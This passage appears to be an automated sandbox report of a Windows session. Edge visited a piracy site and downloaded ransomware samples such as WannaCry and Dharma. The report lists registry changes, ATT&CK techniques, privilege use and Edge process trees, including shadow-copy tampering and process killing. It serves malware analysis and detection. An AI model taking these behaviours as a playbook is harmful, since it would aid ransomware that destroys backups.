Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Dharma.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 3 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
9760	vssadmin.exe
28860	vssadmin.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
26776	taskkill.exe
26356	taskkill.exe
26812	taskkill.exe
26628	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 16 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "1153524334"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31145727"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9"	IEXPLORE.EXE

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
12628	reg.exe
21268	reg.exe
9888	reg.exe
12668	reg.exe
10532	reg.exe
10712	reg.exe
24652	reg.exe
26472	reg.exe
14516	reg.exe
26436	reg.exe
21532	reg.exe
9532	reg.exe
18000	reg.exe
10284	reg.exe
20612	reg.exe
23964	reg.exe
24708	reg.exe
19172	reg.exe
19120	reg.exe
6148	reg.exe
13424	reg.exe
12828	reg.exe
24076	reg.exe
23212	reg.exe
21972	reg.exe
10028	reg.exe
11952	reg.exe
7744	reg.exe
21372	reg.exe
25100	reg.exe
25092	reg.exe
32588	reg.exe
12700	reg.exe
20912	reg.exe
14436	reg.exe
17376	reg.exe
24064	reg.exe
23188	reg.exe
26700	reg.exe
12820	reg.exe
13624	reg.exe
19204	reg.exe
20636	reg.exe
21460	reg.exe
17264	reg.exe
7552	reg.exe
16276	reg.exe
13912	reg.exe
7160	reg.exe
13656	reg.exe
12208	reg.exe
12140	reg.exe
17192	reg.exe
13516	reg.exe
15008	reg.exe
20828	reg.exe
21952	reg.exe
21360	reg.exe
24840	reg.exe
17972	reg.exe
18056	reg.exe
13760	reg.exe
26016	reg.exe
14196	reg.exe

NTFS ADS 9 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 977444.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 24175.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 279975.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\ViraLock.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\search.htm:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\CoronaVirus.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Dharma.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 601882.crdownload:SmartScreen	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4896	msedge.exe
4896	msedge.exe
2816	msedge.exe
2816	msedge.exe
1316	identity_helper.exe
1316	identity_helper.exe
5088	msedge.exe
5088	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
4240	msedge.exe
4240	msedge.exe
6268	msedge.exe
6268	msedge.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe
6704	CoronaVirus.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
9792	bIMsAwUc.exe
28260	!WannaDecryptor!.exe

Suspicious behavior: LoadsDriver 64 IoCs

pid	Process
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32708	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe
32100	mssql.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	1692	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1692	AUDIODG.EXE
Token: SeBackupPrivilege	25776	vssvc.exe
Token: SeRestorePrivilege	25776	vssvc.exe
Token: SeAuditPrivilege	25776	vssvc.exe
Token: SeDebugPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeLoadDriverPrivilege	32708	mssql.exe
Token: SeDebugPrivilege	13724	mssql2.exe
Token: SeIncreaseQuotaPrivilege	14232	WMIC.exe
Token: SeSecurityPrivilege	14232	WMIC.exe
Token: SeTakeOwnershipPrivilege	14232	WMIC.exe
Token: SeLoadDriverPrivilege	14232	WMIC.exe
Token: SeSystemProfilePrivilege	14232	WMIC.exe
Token: SeSystemtimePrivilege	14232	WMIC.exe
Token: SeProfSingleProcessPrivilege	14232	WMIC.exe
Token: SeIncBasePriorityPrivilege	14232	WMIC.exe
Token: SeCreatePagefilePrivilege	14232	WMIC.exe
Token: SeBackupPrivilege	14232	WMIC.exe
Token: SeRestorePrivilege	14232	WMIC.exe
Token: SeShutdownPrivilege	14232	WMIC.exe
Token: SeDebugPrivilege	14232	WMIC.exe
Token: SeSystemEnvironmentPrivilege	14232	WMIC.exe
Token: SeRemoteShutdownPrivilege	14232	WMIC.exe
Token: SeUndockPrivilege	14232	WMIC.exe
Token: SeManageVolumePrivilege	14232	WMIC.exe
Token: 33	14232	WMIC.exe
Token: 34	14232	WMIC.exe
Token: 35	14232	WMIC.exe
Token: 36	14232	WMIC.exe
Token: SeIncreaseQuotaPrivilege	14232	WMIC.exe
Token: SeSecurityPrivilege	14232	WMIC.exe
Token: SeTakeOwnershipPrivilege	14232	WMIC.exe
Token: SeLoadDriverPrivilege	14232	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
17056	SearchHost.exe
17056	SearchHost.exe
9672	SearchHost.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe

Suspicious use of SendNotifyMessage 17 IoCs

pid	Process
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
2816	msedge.exe
17056	SearchHost.exe
17056	SearchHost.exe
9672	SearchHost.exe

Suspicious use of SetWindowsHookEx 15 IoCs

pid	Process
32708	mssql.exe
13724	mssql2.exe
17056	SearchHost.exe
32708	mssql.exe
32100	mssql.exe
720	mssql2.exe
9672	SearchHost.exe
32100	mssql.exe
27528	!WannaDecryptor!.exe
27528	!WannaDecryptor!.exe
28188	!WannaDecryptor!.exe
28188	!WannaDecryptor!.exe
28260	!WannaDecryptor!.exe
28260	!WannaDecryptor!.exe
32460	!WannaDecryptor!.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2816 wrote to memory of 2040	2816	msedge.exe	77
PID 2816 wrote to memory of 2040	2816	msedge.exe	77
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 1896	2816	msedge.exe	78
PID 2816 wrote to memory of 4896	2816	msedge.exe	79
PID 2816 wrote to memory of 4896	2816	msedge.exe	79
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80
PID 2816 wrote to memory of 5092	2816	msedge.exe	80

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
31056	attrib.exe
31092	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://pirateadobe.com
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e3da3cb8,0x7ff9e3da3cc8,0x7ff9e3da3cd8
  2⤵
  PID:2040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1848 /prefetch:2
  2⤵
  PID:1896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2488 /prefetch:8
  2⤵
  PID:5092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  PID:3280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:4084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1
  2⤵
  PID:3164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
  2⤵
  PID:3392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
  2⤵
  PID:4496
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:1
  2⤵
  PID:1124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4300 /prefetch:1
  2⤵
  PID:420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
  2⤵
  PID:2180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:1
  2⤵
  PID:1568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1220 /prefetch:1
  2⤵
  PID:4880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4300 /prefetch:1
  2⤵
  PID:2088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
